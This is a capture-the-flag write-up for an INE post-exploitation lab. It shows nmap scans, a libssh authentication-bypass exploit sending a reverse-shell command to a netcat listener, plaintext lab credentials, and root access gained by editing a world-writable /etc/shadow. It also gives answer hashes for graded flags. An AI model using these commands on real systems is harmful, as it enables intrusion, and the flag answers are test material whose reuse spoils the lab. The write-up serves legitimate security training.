System-Host Based Attacks CTF 1
Overview¶
Post-Exploitation refers to the phase in a penetration test or cyberattack that occurs after an attacker successfully gains access to a system or network. During this phase, the attacker aims to maximize the value of their access by escalating privileges, maintaining persistence, and gathering sensitive information. Post-exploitation techniques include pivoting to other systems, extracting passwords, exfiltrating confidential data, and leveraging compromised systems to further penetrate the network. The goal is to identify critical assets, assess the extent of the breach, and map out pathways for potential lateral movement within the target environment. Post-exploitation also focuses on covering tracks to evade detection and ensuring continued access, emphasizing the need for strong monitoring and rapid response mechanisms to prevent further compromise.
This lab is designed to challenge and refine your skills in Post-Exploitation techniques, focusing on identifying and uncovering hidden information within a target machine.
Skill Check Labs are interactive, hands-on exercises designed to validate the knowledge and skills you’ve gained in this course through real-world scenarios. Each lab presents practical tasks that require you to apply what you’ve learned. Unlike other INE labs, solutions are not provided, challenging you to demonstrate your understanding and problem-solving abilities. Your performance is graded, allowing you to track progress and measure skill growth over time.
Lab Environment
In this lab environment, you will be provided with GUI access to a Kali Linux machine. Two machines are accessible at http://target1.ine.local and http://target2.ine.local.
Objective: Execute Post-Exploitation techniques on the target to uncover hidden flags and fully exploit the compromised environment.
Flags to Capture:
Flag 1: The file that stores user account details is worth a closer look. (target1.ine.local)
Flag 2: User groups might reveal more than you expect.
Flag 3: Scheduled tasks often have telling names. Investigate the cron jobs to uncover the secret.
Flag 4: DNS configurations might point you in the right direction. Also, explore the home directories for stored credentials.
Flag 5: Use the discovered credentials to gain higher privileges and explore the root's home directory on target2.ine.local.
Writeup¶
Flag 1¶
Nmap
┌──(root㉿INE)-[~]
└─# nmap -p- --min-rate 10000 target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-18 13:15 IST
Nmap scan report for target1.ine.local (192.174.97.4)
Host is up (0.000024s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
MAC Address: 02:42:C0:AE:61:04 (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 2.22 seconds
┌──(root㉿INE)-[~]
└─# nmap -sC -sV -p22 target1.ine.local
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-04-18 13:19 IST
Nmap scan report for target1.ine.local (192.174.97.4)
Host is up (0.000055s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 31:e2:1d:f1:b2:39:0c:a3:ec:db:01:4a:eb:a2:39:c7 (RSA)
MAC Address: 02:42:C0:AE:61:04 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.47 seconds
libssh 0.8.3 ┌──(root㉿INE)-[~]
└─# searchsploit libssh
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
libSSH - Authentication Bypass | linux/remote/45638.py
LibSSH 0.7.6 / 0.8.4 - Unauthorized Access | linux/remote/46307.py
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
┌──(root㉿INE)-[~]
└─# cat script.py
#!/usr/bin/env python3
import sys
import paramiko
import socket
import logging
# pip3 install paramiko==2.0.8
#logging.basicConfig(stream=sys.stdout, level=logging.DEBUG)
logging.basicConfig(stream=sys.stdout)
bufsize = 2048
def execute(hostname, port, command):
sock = socket.socket()
try:
...
┌──(root㉿INE)-[~]
└─# python3 script.py target1.ine.local 22 "/bin/bash -i >& /dev/tcp/192.174.97.2/4444 0>&1"
┌──(root㉿INE)-[~]
└─# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.174.97.2] from (UNKNOWN) [192.174.97.4] 57006
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
[user@target1 /]$
[user@target1 home]$ cat /etc/passwd
cat /etc/passwd
root:x:0:0::/root:/usr/bin/bash
alpm:x:980:980:Arch Linux Package Management:/:/usr/bin/nologin
bin:x:1:1::/:/usr/bin/nologin
daemon:x:2:2::/:/usr/bin/nologin
mail:x:8:12::/var/spool/mail:/usr/bin/nologin
ftp:x:14:11::/srv/ftp:/usr/bin/nologin
http:x:33:33::/srv/http:/usr/bin/nologin
nobody:x:65534:65534:Kernel Overflow User:/:/usr/bin/nologin
dbus:x:81:81:System Message Bus:/:/usr/bin/nologin
systemd-coredump:x:979:979:systemd Core Dumper:/:/usr/bin/nologin
systemd-network:x:978:978:systemd Network Management:/:/usr/bin/nologin
systemd-oom:x:977:977:systemd Userspace OOM Killer:/:/usr/bin/nologin
systemd-journal-remote:x:976:976:systemd Journal Remote:/:/usr/bin/nologin
systemd-resolve:x:975:975:systemd Resolver:/:/usr/bin/nologin
systemd-timesync:x:974:974:systemd Time Synchronization:/:/usr/bin/nologin
tss:x:973:973:tss user for tpm2:/:/usr/bin/nologin
uuidd:x:68:68::/:/usr/bin/nologin
user:x:1000:1000::/home/user:/usr/bin/bash
FLAG1_***:x:1001:984::/home/FLAG1_***/usr/bin/bash
Answer
aaa9d7895bf64f2bb41ae82eb5c26629
Flag 2¶
[user@target1 home]$ cat /etc/group
cat /etc/group
root:x:0:root
sys:x:3:bin
mem:x:8:
ftp:x:11:
mail:x:12:
log:x:19:
smmsp:x:25:
proc:x:26:
games:x:50:
lock:x:54:
network:x:90:
floppy:x:94:
scanner:x:96:
power:x:98:
nobody:x:65534:
adm:x:999:daemon
wheel:x:998:
utmp:x:997:
audio:x:996:
disk:x:995:
input:x:994:
kmem:x:993:
kvm:x:992:
lp:x:991:
optical:x:990:
render:x:989:
sgx:x:988:
storage:x:987:
tty:x:5:
uucp:x:986:
video:x:985:
users:x:984:
groups:x:983:
systemd-journal:x:982:
rfkill:x:981:
alpm:x:980:
bin:x:1:daemon
daemon:x:2:bin
http:x:33:
dbus:x:81:
systemd-coredump:x:979:
systemd-network:x:978:
systemd-oom:x:977:
systemd-journal-remote:x:976:
systemd-resolve:x:975:
systemd-timesync:x:974:
tss:x:973:
uuidd:x:68:
user:x:1000:
# FLAG2_***
Answer
8a15b058b474446ca38adb46f04d7225
Flag 3¶
Answer
c61a731d37f343bb97ab3afdabc9ebe5
Flag 4¶
[user@target1 /]$ cat /etc/hosts
cat /etc/hosts
127.0.0.1 localhost
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.174.97.4 target1.ine.local target1
#FLAG4_***
192.174.97.2 INE
192.174.97.3 target2.ine.local
192.174.97.4 target1.ine.local
Answer
6d7ae0a94bda4fca83197f1cac17d71a
Flag 5¶
Abbiamo scoperto le credenziali accidentalmente prima: john:Pass@john123
┌──(root㉿INE)-[~]
└─# ssh john@target2.ine.local
john@target2.ine.local's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.8.0-39-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
john@target2:~$
-rwxrwxrwx 1 root root 89 Jun 17 2024 start.sh
john@target2:/home$ cat start.sh
#!/bin/bash
service apache2 start
service ssh start
service postfix start
supervisord -njohn@target2:/home$
find / -not -type l -perm -o+w
...
/sys/firmware
find: ‘/root’: Permission denied
/dev/pts/ptmx
/dev/mqueue
/dev/shm
/dev/null
/dev/random
/dev/full
/dev/tty
/dev/zero
/dev/urandom
/etc/shadow
find: ‘/etc/ssl/private’: Permission denied
find: ‘/etc/dovecot/private’: Permission denied
john@target2:/home$ cat /etc/shadow
root:*:19977:0:99999:7:::
daemon:*:19977:0:99999:7:::
bin:*:19977:0:99999:7:::
sys:*:19977:0:99999:7:::
sync:*:19977:0:99999:7:::
games:*:19977:0:99999:7:::
man:*:19977:0:99999:7:::
lp:*:19977:0:99999:7:::
mail:*:19977:0:99999:7:::
news:*:19977:0:99999:7:::
uucp:*:19977:0:99999:7:::
proxy:*:19977:0:99999:7:::
www-data:*:19977:0:99999:7:::
backup:*:19977:0:99999:7:::
list:*:19977:0:99999:7:::
irc:*:19977:0:99999:7:::
gnats:*:19977:0:99999:7:::
nobody:*:19977:0:99999:7:::
_apt:*:19977:0:99999:7:::
systemd-network:*:20041:0:99999:7:::
systemd-resolve:*:20041:0:99999:7:::
mysql:!:20041:0:99999:7:::
messagebus:*:20041:0:99999:7:::
ntp:*:20041:0:99999:7:::
postfix:*:20041:0:99999:7:::
dovecot:*:20041:0:99999:7:::
dovenull:*:20041:0:99999:7:::
bind:*:20041:0:99999:7:::
sshd:*:20041:0:99999:7:::
Debian-snmp:!:20041:0:99999:7:::
telnetd:*:20041:0:99999:7:::
john:$y$j9T$Wg2TIAwOkbGDxz1JzXUui.$N66Tm9Am8yo3/dpqEOKDj87y7jKpt.hzsFOAkEFpqMC:20041:0:99999:7:::
john@target2:/home$ nano /etc/shadow
john@target2:/home$ su root
root@target2:/home# cd /root
root@target2:~# ls
flag.txt
root@target2:~# cat flag.txt
FLAG5_***
root@target2:~#
Answer
1c808d74febc4dff83c18a97f1f87360